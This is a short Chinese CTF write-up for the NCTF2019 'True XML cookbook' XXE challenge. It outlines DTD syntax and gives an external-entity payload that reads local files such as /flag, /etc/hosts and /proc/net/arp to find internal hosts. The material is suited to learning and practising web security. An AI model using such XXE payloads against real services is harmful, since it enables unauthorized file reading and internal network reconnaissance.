[NCTF2019]True XML cookbook 1

王传学

 关注

阅读 31

2022-05-05

又是一道关于XML注入的题

xml语法:

<?xml version="1.0" encoding="UTF-8"?>  //xml声明

<!DOCTYPE copyright [        //DTD(文档类型定义)

<!ELEMENT note (to,reset,login)>   //定义元素

<!ENTITY test SYSTEM "url">        //定义外部实体test

]>

直接抓包!

<?xml version="1.0" ?>
<!DOCTYPE note [      //note可以随意的值
<!ENTITY snowlyzz SYSTEM "file:///flag">   //定义外部实体test
]>
<user>
<username>&snowlyzz;</username>
<password>123456</password>
</user>

报错了

 看看其他路径下的内容

 /etc/hosts 下只有报错内容

 试试/proc/net/arp

 爆装备了!

接下来访问对方IP就能获得到flag

关于XXE漏洞的全部内容:XXE

相关推荐

[NCTF2019]Fake XML cookbook XML注入

微言记 43 0 0

[NCTF2019]Fake XML cookbook(特详解)

书呆鱼 32 0 0

buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)

caoxingyu 146 0 0

[NCTF2019]SQLi

老北京的热干面 29 0 0

[NCTF2019]SQLi regexp 盲注

_阿瑶 44 0 0

web.xml is missing and <failOnMissingWebXml> is set to true

成义随笔 75 0 0

2019-3-1-C#-json-转-xml-字符串

得一道人 12 0 0

(a== 1 && a ==2 && a==3)可能为true吗?

Brose 63 0 0

如何实现a===1 && a===2 && a===3返回true?

大柚子top 193 0 0

OpenGL_4.0_Shading_Language_Cookbook 读书笔记(1)

西特张 148 0 0

精彩评论(0)

0 0 举报